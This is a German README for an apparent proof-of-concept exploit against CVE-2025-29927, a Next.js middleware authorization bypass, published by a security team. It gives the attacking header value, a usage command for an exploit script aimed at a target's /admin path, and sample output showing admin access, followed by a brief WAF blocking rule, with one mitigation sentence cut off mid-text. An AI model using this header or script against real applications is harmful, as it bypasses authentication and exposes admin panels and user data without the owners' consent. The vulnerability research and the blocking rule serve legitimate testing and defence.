
Hier ist ein einfacher, aber effektiver Exploit für CVE-2025-29927.
Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für CVE-2025-29927, eine kritische Schwachstelle in Next.js, die es Angreifern ermöglicht, Autorisierungsprüfungen zu umgehen, indem sie einen middleware-spezifischen HTTP-Header missbrauchen.
Next.js-Anwendungen verlassen sich oft auf Middleware für Autorisierung und Zugriffskontrolle. Diese CVE entsteht durch einen Logikfehler bei der Verarbeitung des x-middleware-subrequest-Headers. Wenn dieser Header auf middleware gesetzt ist, kann der Server fälschlicherweise annehmen, dass die Anfrage aus interner Logik stammt, und middlewarebasierte Authentifizierung umgehen.
Dies kann es Angreifern ermöglichen, auf Admin-Panels, geschützte APIs oder Benutzerdaten zuzugreifen – ohne Anmeldeinformationen oder gültige Sitzung.
Wir stellen ein einfaches Python-Skript zur Verfügung, um zu testen, ob eine Next.js-Anwendung verwundbar ist.
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
[+] Sende Anfrage an: https://target.com/admin
[+] Verwende Header: x-middleware-subrequest: middleware
[+] Statuscode: 200
[+] Antworttext (erste 500 Zeichen):
<!DOCTYPE html><html><head>...Sie sind als Admin angemeldet...
x-middleware-subrequest nicht als Vertrauenssignal.WAF-Logik:
if header 'x-middleware-subrequest' == 'middleware':
block_request()
Dieser PoC wurde vom Offensive Security Team der W2H Corp. im Rahmen unserer kontinuierlichen Sicherheitsforschung entwickelt. Der ursprüngliche Beitrag zur Erklärung der CVE befindet sich hier.